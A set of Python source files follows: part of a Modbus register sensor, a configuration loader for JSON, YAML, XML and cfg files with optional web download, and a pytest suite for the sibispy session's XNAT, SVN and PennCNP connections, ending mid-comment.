register.get(CONF_DEVICE_CLASS),
)
)
if not sensors:
return False
add_entities(sensors)
class ModbusRegisterSensor(RestoreEntity):
"""Modbus register sensor."""
def __init__(
self,
hub,
name,
slave,
register,
register_type,
unit_of_measurement,
count,
reverse_order,
scale,
offset,
structure,
precision,
data_type,
device_class,
):
"""Initialize the modbus register sensor."""
self._hub = hub
self._name = name
self._slave = int(slave) if slave else None
self._register = int(register)
self._register_type = register_type
self._unit_of_measurement = unit_of_measurement
self._count = int(count)
self._reverse_order = reverse_order
self._scale = scale
self._offset = offset
self._precision = precision
self._structure = structure
self._data_type = data_type
self._device_class = device_class
self._value = None
self._available = True
async def async_added_to_hass(self):
"""Handle entity which will be added."""
state = await self.async_get_last_state()
if not state:
return
self._value = state.state
@property
def state(self):
"""Return the state of the sensor."""
return self._value
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
@property
def device_class(self) -> Optional[str]:
"""Return the device class of the sensor."""
return self._device_class
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
def update(self):
"""Update the state of the sensor."""
try:
if self._register_type == CALL_TYPE_REGISTER_INPUT:
result = self._hub.read_input_registers(
self._slave, self._register, self._count
)
else:
result = self._hub.read_holding_registers(
self._slave, self._register, self._count
)
except ConnectionException:
self._available = False
return
if isinstance(result, (ModbusException, ExceptionResponse)):
self._available = False
return
registers = result.registers
if self._reverse_order:
registers.reverse()
byte_string = b"".join([x.to_bytes(2, byteorder="big") for x in registers])
if self._data_type != DATA_TYPE_STRING:
val = struct.unpack(self._structure, byte_string)[0]
val = self._scale * val + self._offset
if isinstance(val, int):
self._value = str(val)
if self._precision > 0:
self._value += "." + "0" * self._precision
else:
self._value = f"{val:.{self._precision}f}"
else:
self._value = byte_string.decode()
self._available = True
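# ---------------------------------------------------------------------------
# Hedged sketch (not part of the sensor above): update() turns 16-bit Modbus
# registers into a value with struct. The helper below shows the same
# decoding for two registers holding a big-endian 32-bit float (">f" is what
# the data_types table yields for DATA_TYPE_FLOAT with count=2); the register
# contents are made up and decode to roughly 123.456.
def _example_decode_registers():
    registers = [0x42F6, 0xE979]
    byte_string = b"".join(r.to_bytes(2, byteorder="big") for r in registers)
    return struct.unpack(">f", byte_string)[0]
# ---------------------------------------------------------------------------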
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Module for reading and writing the configuration.
USAGE:
    configuration.get_configuration([location], [source_type], [file_type], [**kwargs]):
        location: file name with path
        source_type: see below
        file_type: see below
        kwargs: extra parameters (depends on the source_type)
It supports different source types:
    file: local file.
    web: file on the web (e.g. http)
It supports different file types:
    json (based on the json module)
    xml (using xmltodict by Martin Blech)
    yaml (using pyyaml by pyyaml.org)
    cfg (based on the configparser module)
"""
from collections.abc import MutableMapping
class Configuration(MutableMapping):
"""
Dict like class containing the configuration.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the dictionary the same as a real dict.
"""
self.store = dict()
if args or kwargs:
self.update(dict(*args, **kwargs))
def __getitem__(self, key):
"""
Get an item form the configuration dict.
"""
return self.store[self.__keytransform__(key)]
def __setitem__(self, key, value):
"""
Set an item in the configuration dict.
"""
self.store[self.__keytransform__(key)] = value
def __delitem__(self, key):
"""
Remove an item from the configuration dict.
"""
del self.store[self.__keytransform__(key)]
def __iter__(self):
"""
        Return the iterator of the dictionary.
        """
        return iter(self.store)
    def __len__(self):
        """
        Return the length of the dictionary.
"""
return len(self.store)
def __keytransform__(self, key):
"""
Transforms the key.
"""
return key
# -- We want it to output like a dict --
def __repr__(self):
"""
Represent itself as a dict.
"""
return self.store.__repr__()
# -- Configuration specific methods: load, save & close. --
def load(self):
"""
Reloads the configuration - does nothing in Configuration.
Normally only called once, usually by __enter__ if you're using the with statement.
"""
pass
def save(self):
"""
Call this when wanting to do an explicit save of the configuration.
        It can be called multiple times in the lifetime of the object.
        It must raise a NotImplementedError if this is not supported for your
        type of configuration.
        """
        raise NotImplementedError(
            "Save is not implemented on %s." % (self.__class__.__name__)
        )
def close(self):
"""
        Always call this when you are done with a configuration.
        Here it is just a place holder for subclasses that need to clean up
        after themselves.
"""
pass
    # -- Context manager --
def __enter__(self):
"""
Implementing it as a context manager: loading the configuration.
"""
self.load()
return self
def __exit__(self, *args):
"""
Implementing it as a context manager: call close.
"""
self.close()
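# A minimal usage sketch for Configuration subclasses (FileConfiguration is
# defined below; the file name "app.json" is illustrative): entering the
# context calls load(), leaving it calls close().
#
#     with FileConfiguration("app.json") as config:
#         print(config["some"]["key"])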
class SplitConfiguration(Configuration):
"""
Receives a list of Configuration instances where the extra ones are backups.
The first configuration instance in the list is the main one and the only
one that is used for writing the configuration. If it can't be loaded the
first backup will be loaded (and so on) and that configuration is
immediately saved to the main configuration.
After the initial load this behaves just like there is only the main
configuration instance. Actually, if the main configuration is good the
backups are never used.
"""
def __init__(self, configurations):
"""
Initializes a split configuration from different configurations.
"""
super().__init__()
self.main = None
backup = []
for config in configurations:
# First one is the main one.
if self.main is None:
self.main = config
else:
backup.append(config)
if len(backup) == 0:
self.backup = None
elif len(backup) == 1:
self.backup = backup[0]
else:
self.backup = SplitConfiguration(backup)
def load(self):
"""
Load the configuration: first try the main.
"""
try:
# Try to load the main configuration.
self.main.load()
        except Exception:
# That didn't work, so trying the backup.
if self.backup is not None:
# Loading from the backup and saving it to the main configuration.
self.backup.load()
self.main.update(self.backup)
self.main.save()
else:
# No backup, re-raising the original exception.
raise
def save(self):
"""
Save the configuration: always to the main.
"""
self.main.save()
def __enter__(self):
"""
Return the context manager of the main.
"""
self.load()
# Once the initial load is done, only the main configuration matters.
return self.main
def __getitem__(self, key):
"""
Get the item.
"""
return self.main.__getitem__(key)
def __setitem__(self, key, value):
"""
Set the item.
"""
return self.main.__setitem__(key, value)
def __delitem__(self, key):
"""
Remove the item.
"""
        return self.main.__delitem__(key)
def __len__(self):
"""
        Return the length.
"""
return self.main.__len__()
def __repr__(self):
"""
Represent as the main.
"""
return self.main.__repr__()
def clear(self):
"""
Clear the main.
"""
return self.main.clear()
def copy(self):
"""
Returns a copy
"""
return self.main.copy()
    def has_key(self, key):
        return key in self.main
def update(self, *args, **kwargs):
return self.main.update(*args, **kwargs)
def keys(self):
return self.main.keys()
def values(self):
return self.main.values()
def items(self):
return self.main.items()
def pop(self, *args):
return self.main.pop(*args)
def __cmp__(self, item):
return self.main.__cmp__(item)
def __contains__(self, item):
return self.main.__contains__(item)
def __iter__(self):
return self.main.__iter__()
def __unicode__(self):
return self.main.__unicode__()
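# An illustrative sketch (file names are made up): the first configuration is
# the writable main one; the second is read only if the main fails to load,
# after which its contents are written back into the main.
#
#     config = SplitConfiguration([
#         FileConfiguration("local.json"),
#         FileConfiguration("defaults.json"),
#     ])
#     config.load()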
class ConfigurationParser:
"""
Dummy root of all configuration parser classes.
"""
def __init__(self, location, **options):
"""
Initialize with a location.
"""
self.location = location
self.options = options
@staticmethod
def infer_type(value):
        if value is None:
            # Empty values (e.g. empty XML elements) become empty dicts.
            return {}
        try:
            value = int(value)
        except (ValueError, TypeError):
            try:
                value = float(value)
            except (ValueError, TypeError):
                pass
        return value
def load_into_dict(self, configuration):
"""
Must be overwritten in the subclass.
"""
        if type(self) is ConfigurationParser:
            raise NotImplementedError("ConfigurationParser is a dummy.")
else:
raise NotImplementedError(
"Load is not implemented in %s." % (self.__class__.__name__)
)
def save_from_dict(self, configuration):
"""
Must be overwritten in the subclass.
"""
        if type(self) is ConfigurationParser:
            raise NotImplementedError("ConfigurationParser is a dummy.")
else:
raise NotImplementedError(
"Save is not implemented in %s." % (self.__class__.__name__)
)
def __str__(self):
"""
String representation of the parser.
"""
return super().__str__() + " on location %s" % (self.location)
class JsonConfigurationParser(ConfigurationParser):
"""
Parses a json file.
"""
def load_into_dict(self, configuration):
"""
Parsing a json file and updating the configuration.
"""
import json
json_conf = None
with open(self.location, encoding="utf-8") as data_file:
json_conf = json.load(data_file)
configuration.update(json_conf)
def save_from_dict(self, configuration):
"""
Saving the configuration again.
"""
import json
with open(self.location, "w", encoding="utf-8") as data_file:
json.dump(
dict(configuration),
data_file,
sort_keys=True,
indent=4,
separators=(",", ": "),
)
class YamlConfigurationParser(ConfigurationParser):
"""
Parses a yaml file.
"""
def load_into_dict(self, configuration):
"""
Parsing a yaml file and updating the configuration.
"""
import yaml
configuration.update(
yaml.load(
open(self.location, "r", encoding="utf-8"), Loader=yaml.SafeLoader
)
)
def save_from_dict(self, configuration):
"""
Saving the configuration again to the yaml.
"""
import yaml
yaml.dump(dict(configuration), open(self.location, "w", encoding="utf-8"))
class XmlConfigurationParser(ConfigurationParser):
"""
Parses an XML file.
"""
def load_into_dict(self, configuration):
"""
Parsing an xml file and updating the configuration.
"""
import xmltodict
configuration.update(
xmltodict.parse(
open(self.location, "rb"),
encoding="utf-8",
postprocessor=lambda path, key, value: (
key,
ConfigurationParser.infer_type(value),
),
)["suapp"]
)
def save_from_dict(self, configuration):
"""
Saving the configuration again to xml.
"""
import xmltodict
xmltodict.unparse(
{"suapp": dict(configuration)},
open(self.location, "wb"),
encoding="utf-8",
pretty=True,
)
class CfgConfigurationParser(ConfigurationParser):
"""
Parses a configuration in the configparser format.
"""
def configuration_to_flat_dict(self, configuration, prefix=None):
"""
Flattens the configuration from multiple levels to one.
From:
{"a": {"b": {"c": "value"}}}
To:
{"a.b.c": "value"}
"""
if not prefix:
prefix = []
config_flat = dict()
for key, value in configuration.items():
new_prefix = list(prefix)
new_prefix.append(key)
            if isinstance(value, dict):
                config_flat.update(
                    self.configuration_to_flat_dict(value, prefix=new_prefix)
                )
else:
config_flat[".".join(new_prefix)] = value
if not config_flat:
# Nothing put into it, so creating an empty dummy sub prefix entry.
config_flat[".".join(prefix) + "."] = ""
return config_flat
def configuration_to_configparser(self, configuration):
"""
Converts the configuration to a configuration for configparser.
From:
{"a": {"b": {"c": "value"}}}
To:
[a.b]
c = value
"""
import configparser
config_parser = configparser.RawConfigParser()
config_flat = self.configuration_to_flat_dict(configuration)
for fullkey, value in config_flat.items():
try:
(section, key) = fullkey.rsplit(".", 1)
except ValueError:
section = ""
key = fullkey
try:
if section != "":
config_parser.add_section(section)
except configparser.DuplicateSectionError:
# Ignore
pass
            if key:
                # configparser only accepts string values, so stringify here.
                config_parser.set(section, key, str(value))
return config_parser
def load_into_dict(self, configuration):
"""
Reads in the config file.
"""
import configparser
config = configparser.ConfigParser()
config.read_file(open(self.location, encoding="utf-8"))
defaults = config.defaults()
for key, value in defaults.items():
configuration[key] = ConfigurationParser.infer_type(value)
for section in config.sections():
section_path = section.split(".")
current = configuration
for step in section_path:
if step not in current:
current[step] = {}
current = current[step]
for key in config.options(section):
raw = self.options.get("raw", True)
value = config.get(section, key, raw=raw)
if self.options.get("sparse", True):
if key in defaults:
if defaults[key] == value:
continue
current[key] = ConfigurationParser.infer_type(value)
def save_from_dict(self, configuration):
"""
Saves the configuration to a config file.
It uses the write function on the configparser that needs the file handle.
"""
config_parser = self.configuration_to_configparser(configuration)
with open(self.location, "w", encoding="utf-8") as config_parser_file_handle:
config_parser.write(config_parser_file_handle)
def get_configuration_parser(location, file_type, **options):
"""
Returns the parser based on the file type.
"""
if file_type == "json":
return JsonConfigurationParser(location, **options)
elif file_type == "cfg":
return CfgConfigurationParser(location, **options)
elif file_type == "xml":
return XmlConfigurationParser(location, **options)
elif file_type == "yaml":
return YamlConfigurationParser(location, **options)
else:
raise NotImplementedError("Unknown file type to parse: %s." % (file_type))
class FileConfiguration(Configuration):
"""
Loads and saves the configuration from the file system.
"""
def __init__(self, location, file_type=None, **options):
"""
Initializing the parser depending on the file type.
"""
super().__init__()
# Trying to infer the file type if not given.
if not file_type:
if location.lower().endswith(".json"):
file_type = "json"
elif location.lower().endswith(".xml"):
file_type = "xml"
elif location.lower().endswith(".cfg"):
file_type = "cfg"
elif location.lower().endswith(".ini"):
file_type = "cfg"
elif location.lower().endswith(".yml"):
file_type = "yaml"
elif location.lower().endswith(".yaml"):
file_type = "yaml"
else:
file_type = "???"
# Based on the file type.
self.parser = get_configuration_parser(location, file_type, **options)
def load(self):
"""
Have the parser read in the configuration.
"""
self.parser.load_into_dict(self)
def save(self):
"""
Have the parser write out the configuration.
"""
self.parser.save_from_dict(self)
class WebConfiguration(Configuration):
"""
Loads the configuration from the web.
"""
def __init__(self, url, **options):
"""
        Initializes with a URL.
"""
super().__init__()
self.url = url
self.options = options
def load(self):
"""
Downloading the web resource to a temporary file and reading it in.
"""
import os
import shutil
import tempfile
import urllib.request
        # Try to infer the file type from the URL's extension.
        file_type = None
        if "." in self.url:
            file_type = self.url.rsplit(".", 1)[1]
            if "/" in file_type:
                # The URL doesn't seem to end in a file name, so this was wrong.
                file_type = None
file_name = None
try:
# Download the file from `url` and save it locally under `file_name`:
(os_level_handle, file_name) = tempfile.mkstemp(suffix=".%s" % (file_type))
os.close(os_level_handle)
with urllib.request.urlopen(self.url) as response, open(
file_name, "wb"
) as out_file:
shutil.copyfileobj(response, out_file)
# Using FileConfiguration on the temporary file to do the real stuff.
file_conf = FileConfiguration(file_name, file_type, **self.options)
file_conf.load()
self.update(file_conf)
finally:
try:
# Always try to delete the temporary file.
os.remove(file_name)
            except Exception:
pass
def save(self):
"""
        Saving of the configuration on a WebConfiguration is not supported.
TODO EXTRA: we could try to do a HTTP PUT or stuff similar.
"""
raise NotImplementedError("Save is not implemented on WebConfiguration.")
def get_configuration(location=None, source_type=None, file_type=None, **kwargs):
"""
Returns the configuration object for the location.
Possible source types are: http, file. If not specified it tries
to infer the type if it is 'http' and else defaults to 'file'.
The file type is only used when the source type is 'file'.
"""
# Inferring source type if not given.
if not source_type:
if not location:
return Configuration(**kwargs)
elif isinstance(location, dict):
return Configuration(**location)
elif isinstance(location, list):
configuration_list = []
for sub_location in location:
if isinstance(sub_location, Configuration):
configuration_list.append(sub_location)
else:
configuration_list.append(
get_configuration(location=sub_location, **kwargs)
)
return SplitConfiguration(configuration_list)
elif location.lower().startswith("http://"):
source_type = "http"
elif location.lower().startswith("https://"):
source_type = "http"
else:
source_type = "file"
# Getting the correct Configuration object.
if source_type == "http":
return WebConfiguration(location, **kwargs)
elif source_type == "file":
return FileConfiguration(location, file_type=file_type, **kwargs)
else:
raise IOError("Unknown source type %s." % (source_type))
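# A small end-to-end sketch (assumption: the current directory is writable;
# the file name "demo.json" is made up for illustration).
if __name__ == "__main__":
    config = get_configuration("demo.json")
    config.update({"app": {"name": "demo", "version": 1}})
    config.save()
    with get_configuration("demo.json") as reloaded:
        print(reloaded["app"]["name"])  # -> demo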
|
|
#!/usr/bin/env python
##
## Copyright 2016 SRI International
## See COPYING file distributed along with the package for the copyright and license terms
##
# If the test script is run with an argument, it runs with the sibis config
# file given by that argument, for example: test_session.py ~/.sibis-general-config.yml
# Otherwise it runs with data/.sibis-general-config.yml
from __future__ import absolute_import
from __future__ import print_function
from builtins import str
import os
import pytest
import shutil
import tempfile
import warnings
from sibispy import session as sess
from . import utils
@pytest.fixture
def session(config_file):
'''
Return a sibispy.Session configured by the provided config_file fixture.
'''
return utils.get_session(config_file)
@pytest.fixture
def slog():
'''
Return a sibislogger instance initialized for a test session.
'''
from sibispy import sibislogger as slog
timeLogFile = '/tmp/test_session-time_log.csv'
if os.path.isfile(timeLogFile) :
os.remove(timeLogFile)
slog.init_log(False, False,'test_session', 'test_session','/tmp')
return slog
@pytest.fixture
def sys_file_parser(session):
# Load in test specific settings :
(parser,err_msg) = session.get_config_test_parser()
assert err_msg is None, "Error: session.get_config_test_parser:" + err_msg
return parser
@pytest.fixture
def config_test_data(sys_file_parser):
config_test_data = sys_file_parser.get_category('test_session')
if not config_test_data :
warnings.warn(UserWarning("Warning: test_session specific settings not defined!"))
config_test_data = dict()
return config_test_data
#
# short sample script
#
def test_short_sample_script(special_opts):
if 'sample_session' != special_opts :
pytest.skip("Test not enabled.")
import sibispy
from sibispy import sibislogger as slog
slog.init_log(False, False,'test_session', 'test_session','/tmp')
session = sibispy.Session()
session.configure()
server = session.connect_server('data_entry', True)
assert server != None, "server should not be None"
def test_config_test_parser(session):
parser, error = session.get_config_test_parser()
assert error == None, "There should not be an error: {}".format(error)
assert parser != None, "Config Parser for test should not be None."
category = parser.get_category('test_session')
assert category, "`test_session` category should exist."
cfg = category['test_config_parser']
assert cfg != None, "Test config should exist."
assert cfg['alpha'] == 12345678, "Values should match"
assert cfg['bravo'] == 'http://example.com'
assert cfg['charlie'] == [ 'uno', 'dos', 'tres', 'cuarto', 'cinco' ]
assert cfg['denver']['California'] == 'Sacramento'
assert cfg['denver']['Colorado'] == 'Denver'
assert cfg['denver']['Texas'] == 'Austin'
def test_config_sys_parser(session):
(sys_file_parser,err_msg) = session.get_config_sys_parser()
assert not err_msg, "Error: session.get_config_sys_parser:" + err_msg
assert sys_file_parser, "Error: `sys_file_parser` should not be None"
session_data = sys_file_parser.get_category('session')
assert session_data, "`session_data` should not be None"
@pytest.mark.parametrize('api_type', [
'svn_laptop'
])
def test_connect_server(session, api_type):
connection = session.connect_server(api_type)
assert connection != None, "Expected to have a connection"
def test_session_xnat_export_general(session, slog):
project = 'xnat'
server = session.connect_server(project, True)
xnat_sessions_fields = ['xnat:mrSessionData/SESSION_ID','xnat:mrSessionData/SUBJECT_ID','xnat:mrSessionData/PROJECTS','xnat:mrSessionData/DATE','xnat:mrSessionData/SCANNER']
xnat_sessions_list = session.xnat_export_general( 'xnat:mrSessionData', xnat_sessions_fields, [ ('xnat:mrSessionData/SESSION_ID','LIKE', '%') ],"subject_session_data")
assert xnat_sessions_list != None
xnat_sessions_dict = dict()
for ( session_id, session_subject_id, projects, date, scanner ) in xnat_sessions_list:
xnat_sessions_dict[session_id] = ( date, scanner, projects )
def test_session_api_svn_laptop(session, config):
laptop_cfg = config['svn_laptop']
if laptop_cfg == None:
warnings.warn(UserWarning("Expected config file to have `svn_laptop` config"))
pytest.skip("Skipping test, `svn_laptop` config missing.")
connected_client = session.connect_server('svn_laptop')
client_info = session.api['svn_laptop']
assert client_info != None, "Expected client_info to not be None"
user = client_info['user']
assert user == laptop_cfg['user'] and user != None, "Expected user to be {} and not be None. got: {} ".format(laptop_cfg['user'], user)
password = client_info['password']
assert password == laptop_cfg['password'] and password != None, "Expected password to be {} and not be None. got: {} ".format(laptop_cfg['password'], password)
client = client_info['client']
assert client != None, "Expected client to not be None"
assert connected_client == client, "Clients should be the same object"
def test_session_connect_server_info(session):
connected_client = session.connect_server('svn_laptop')
svn_info = connected_client.info()
assert svn_info != None, "Response sholuld not be None"
assert svn_info['wcinfo_wcroot_abspath'] == session.get_laptop_svn_dir(), "SVN Working directories should match."
def test_session_xnat_non_empty_query(slog, config_file, session):
project = 'xnat'
server = session.connect_server(project, True)
assert server, "Error: could not connect server! Make sure " + project + " is correctly defined in " + config_file
    # 1. XNAT Test: Non-empty query
with sess.Capturing() as xnat_output:
searchResult = session.xnat_export_general( 'xnat:subjectData', ['xnat:subjectData/SUBJECT_LABEL', 'xnat:subjectData/SUBJECT_ID','xnat:subjectData/PROJECT'], [ ('xnat:subjectData/SUBJECT_LABEL','LIKE', '%')],"subject_list")
if '"err_msg": "Apache Tomcat' in xnat_output.__str__():
warnings.warn(UserWarning("Info: username or password might be incorrect - check crudentials by using them to manually log in XNAT! "))
assert xnat_output.__str__() == '[]', "Error: session.xnat_export_general: failed to perform querry. Got: {}".format(xnat_output.__str__())
assert searchResult != None, "Error: session.xnat_export_general: Test returned empty record"
def test_session_xnat_get_experiment(slog, config_file, session, config_test_data):
project = 'xnat'
server = session.connect_server(project, True)
assert server, "Error: could not connect server! Make sure " + project + " is correctly defined in " + config_file
#
# xnat_get_experiment
#
eid = r"DOES-NOT-EXIST"
with sess.Capturing() as xnat_output:
exp = session.xnat_get_experiment(eid)
assert None == exp, "Error: session.xnat_get_experiment: " + eid + " should not exist!"
if "xnat_uri_test" in list(config_test_data):
[project,subject,eid] = config_test_data["xnat_uri_test"].split(',')
experiment = session.xnat_get_experiment(eid)
assert None != experiment, "Error: session.xnat_get_experiment: " + eid + " should exist!"
# Difference in the call - which one you use will decide where data is stored on hard drive !
print("URI direct:", experiment.resources['nifti'].uri)
experiment = session.xnat_get_experiment(eid,project = project,subject_label = subject)
assert None != experiment, "Error: session.xnat_get_experiment: {} should exist in project {} and subject {} !".format(eid, project, subject)
print("URI with subject:", experiment.resources['nifti'].uri)
# zip_path="/tmp/tmpQcABtX/1_ncanda-localizer-v1.zip"
#file_path= exp.resource('nifti')._uri
#if not os.path.exists(file_path) :
# print "Error: xnat configuration wrong !" + file_path + " does not exist !"
# server.select.project(project).subject(subject).experiment(eid).resource('nifti').put_zip(zip_path, overwrite=True,extract=True)
else :
warnings.warn(RuntimeWarning("Warning: Skipping XNAT uri test as it is not defined"))
def test_session_xnat_stress_test(slog, config_file, session, config_test_data):
project = 'xnat'
client = session.connect_server(project, True)
#
# Stress Test:
#
if "xnat_stress_test" in list(config_test_data) :
[xnat_eid, resource_id, resource_file_bname] = config_test_data["xnat_stress_test"].split('/')
tmpdir = tempfile.mkdtemp()
print("Start XNAT stress test ...")
slog.startTimer2()
# If fails, MIKE solution
target_file = os.path.join(tmpdir, "blub.tar.gz")
client.download_file(xnat_eid, resource_id, resource_file_bname, target_file)
assert os.path.exists(target_file) and os.path.isfile(target_file), "Expected file `{}` to download.".format(target_file)
slog.takeTimer2("XNATStressTest","XNAT Stress Test")
print("... completed")
shutil.rmtree(tmpdir)
else :
warnings.warn(RuntimeWarning("Warning: Skipping XNAT stress test as it is not defined"))
def test_session_xnat_failed_query(slog, config_file, session, config_test_data):
project = 'xnat'
server = session.connect_server(project, True)
test_data = config_test_data['xnat_subject_attribute_test']
    # 3. XNAT Test: Failed query
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute('blub','blub','blub')
assert response[0] == None, "Expected no attribute, got {}".format(response[0])
assert response[1] != None, "Expected Error, got None!"
if "ERROR: session.xnat_get_subject_attribute: subject" not in xnat_output.__str__():
print("Error: session.xnat_get_subject_attribute: Test returned wrong error message")
print(xnat_output.__str__())
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute(test_data['project'],'blub','blub')
assert response[0] == None, "Expected no attribute, got {}".format(response[0])
assert response[1] != None, "Expected Error, got None!"
if "ERROR: session.xnat_get_subject_attribute: subject" not in xnat_output.__str__():
print("Error: session.xnat_get_subject_attribute: Test returned wrong error message")
print(xnat_output.__str__())
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute(test_data['project'], test_data['subject'],'blub')
assert response[0] == None, "Expected no attribute, got {}".format(response[0])
assert response[1] != None, "Expected Error, got None!"
if "ERROR: attribute could not be found" not in xnat_output.__str__():
print("Error: session.xnat_get_subject_attribute: Test returned wrong error message")
print(xnat_output.__str__())
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute(test_data['project'], test_data['subject'], 'label')
assert response[1] == None, "Expected there to be no errors. Got: {}".format(response[1])
assert response[0] != None, "Expected response, got Nothing."
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute(test_data['project'], test_data['subject'], 'ID')
assert response[1] == None, "Expected there to be no errors. Got: {}".format(response[1])
assert response[0] != None, "Expected response, got Nothing."
def test_session_xnat_search(slog, config_file, session, config_test_data):
client = session.connect_server('xnat', True)
subject_project_list = list(client.search( 'xnat:subjectData', ['xnat:subjectData/SUBJECT_LABEL', 'xnat:subjectData/SUBJECT_ID','xnat:subjectData/PROJECT'] ).where( [ ('xnat:subjectData/SUBJECT_LABEL','LIKE', '%')] ).items())
assert subject_project_list != None, "Search result should not be None."
@pytest.fixture
def penncnp_cleanup(session):
yield
session.disconnect_penncnp()
def test_session_browser_penncnp(slog, config_file, session, config_test_data, penncnp_cleanup):
project = 'browser_penncnp'
# import pdb; pdb.set_trace()
server = session.connect_server(project, True)
assert server != None, "Error: could not connect server! Make sure " + project + " is correctly defined in " + config_file
wait = session.initialize_penncnp_wait()
assert session.get_penncnp_export_report(wait)
def test_session_legacy(config_file, special_opts):
import os
import glob
import pandas as pd
import sys
import sibispy
import traceback
from sibispy import sibislogger as slog
from sibispy import config_file_parser as cfg_parser
import tempfile
import shutil
#
# MAIN
#
# if sys.argv.__len__() > 1 :
# config_file = sys.argv[1]
# else :
# config_file = os.path.join(os.path.dirname(sys.argv[0]), 'data', '.sibis-general-config.yml')
if special_opts == 'default_general_config':
config_file = os.path.join(os.path.dirname(sys.argv[0]), 'data', '.sibis-general-config.yml')
timeLogFile = '/tmp/test_session-time_log.csv'
if os.path.isfile(timeLogFile) :
os.remove(timeLogFile)
slog.init_log(False, False,'test_session', 'test_session','/tmp')
session = sess.Session()
assert session.configure(config_file), "Configuration File `{}` is missing or not readable.".format(config_file)
errors = False
# Check that the file infrastructure is setup correctly
for DIR in [session.get_log_dir(), session.get_operations_dir(), session.get_cases_dir(), session.get_summaries_dir(), session.get_dvd_dir(), session.get_datadict_dir()] :
if not os.path.exists(DIR) :
print("ERROR: " + DIR + " does not exist!")
errors = True
for DIR in [ session.get_laptop_imported_dir(), session.get_laptop_svn_dir(), session.get_xnat_dir(), session.get_redcap_uploads_dir()] :
if not os.path.exists(DIR) :
print("ERROR: " + DIR + " does not exist! Ignore if this is back end")
errors = True
# Make sure directories are assigned to the correct user
user_id = os.getuid()
for DIR in [ session.get_laptop_imported_dir(), session.get_laptop_svn_dir() ]:
path_uid = os.stat(DIR).st_uid
if user_id != path_uid :
print("ERROR: Dir '" + DIR + "' owned by user with id", path_uid," and not user running the script (id: " + str(user_id) + ")")
errors = True
for DIR in glob.glob(os.path.join(session.get_log_dir(),"*")):
path_uid = os.stat(DIR).st_uid
if user_id != path_uid :
print("ERROR: Dir '" + DIR + "' owned by user with id", path_uid," and not user running the script (id: " + str(user_id) + ")")
errors = True
bDir = session.get_beta_dir()
if os.path.exists(bDir):
perm = os.stat(bDir).st_mode & 0o777
if perm != 0o777 :
print("ERROR: Permission of " + bDir + " have to be 777 !")
errors = True
else :
print("ERROR: " + bDir + " does not exist!")
errors = True
# Load in test specific settings :
(sys_file_parser,err_msg) = session.get_config_test_parser()
if err_msg :
print("Error: session.get_config_test_parser:" + err_msg)
errors = True
if errors:
assert not errors, "Errors occured, see output."
config_test_data = sys_file_parser.get_category('test_session')
if not config_test_data :
warnings.warn(UserWarning("Warning: test_session specific settings not defined!"))
config_test_data = dict()
# Check that the servers are accessible
with sess.Capturing() as xnat_output:
assert (session.xnat_get_subject_attribute('blub','blub','blub')[0] == None)
assert "Error: XNAT api not defined" in xnat_output.__str__(), "Error: session.xnat_get_subject_attribute: Test did not return correct error message\n"+xnat_output.__str__()
for project in ['xnat','xnat_http', 'svn_laptop', 'data_entry','browser_penncnp', 'import_laptops', 'redcap_mysql_db'] :
print("==== Testing " + project + " ====")
try :
server = session.connect_server(project, True)
if not server:
print("Error: could not connect server! Make sure " + project + " is correctly defined in " + config_file)
errors = True
continue
if project == 'xnat_http':
experiments = session.xnat_http_get_all_experiments()
if not experiments or experiments.text.count('\n') < 2:
print("Error: session.xnat_http_get_all_experiments: failed to perform querry")
errors = True
continue
experiment_id=experiments.text.splitlines()[1].split(',')[0].replace("\"", "")
exp_html=session.xnat_http_get_experiment_xml(experiment_id).text
if not [x for x in exp_html.splitlines() if "xnat:MRSession" in x] :
print("Error: session.xnat_http_get_experiment_xml: failed to perform querry")
errors = True
continue
if project == 'xnat':
print("XNAT Tests moved to different test methods")
# # 1. XNAT Test: Non-Empty querry
# with sess.Capturing() as xnat_output:
# searchResult = session.xnat_export_general( 'xnat:subjectData', ['xnat:subjectData/SUBJECT_LABEL', 'xnat:subjectData/SUBJECT_ID','xnat:subjectData/PROJECT'], [ ('xnat:subjectData/SUBJECT_LABEL','LIKE', '%')],"subject_list")
# if xnat_output.__str__() != '[]' :
# errors = True
# print("Error: session.xnat_export_general: failed to perform querry")
# if '"err_msg": "Apache Tomcat' in xnat_output.__str__():
# warnings.warn(UserWarning("Info: username or password might be incorrect - check crudentials by using them to manually log in XNAT! "))
# print(xnat_output.__str__())
# elif searchResult == None :
# print("Error: session.xnat_export_general: Test returned empty record")
# errors = True
# #
# # xnat_get_experiment
# #
# eid = "DOES-NOT-EXIST"
# with sess.Capturing() as xnat_output:
# exp = session.xnat_get_experiment(eid)
# if exp :
# print("Error: session.xnat_get_experiment: " + eid + " should not exist!")
# errors = True
# if "xnat_uri_test" in list(config_test_data):
# [project,subject,eid] = config_test_data["xnat_uri_test"].split(',')
# experiment = session.xnat_get_experiment(eid)
# if not experiment :
# print("Error: session.xnat_get_experiment: " + eid + " should exist!")
# errors = True
# else :
# # Difference in the call - which one you use will decide where data is stored on hard drive !
# print("URI direct:", experiment.resource('nifti')._uri)
# experiment = session.xnat_get_experiment(eid,project = project,subject_label = subject)
# if not experiment :
# print("Error: session.xnat_get_experiment: " + eid + " should exist in project", project, "and subject ", subject_label, "!")
# errors = True
# else :
# print("URI with subject:", experiment.resource('nifti')._uri)
# # zip_path="/tmp/tmpQcABtX/1_ncanda-localizer-v1.zip"
# #file_path= exp.resource('nifti')._uri
# #if not os.path.exists(file_path) :
# # print "Error: xnat configuration wrong !" + file_path + " does not exist !"
# # server.select.project(project).subject(subject).experiment(eid).resource('nifti').put_zip(zip_path, overwrite=True,extract=True)
# else :
# warnings.warn(RuntimeWarning("Warning: Skipping XNAT uri test as it is not defined"))
# #
# # Stress Test:
# #
# if "xnat_stress_test" in list(config_test_data) :
# [xnat_eid, resource_id, resource_file_bname] = config_test_data["xnat_stress_test"].split('/')
# tmpdir = tempfile.mkdtemp()
# print("Start XNAT stress test ...")
# slog.startTimer2()
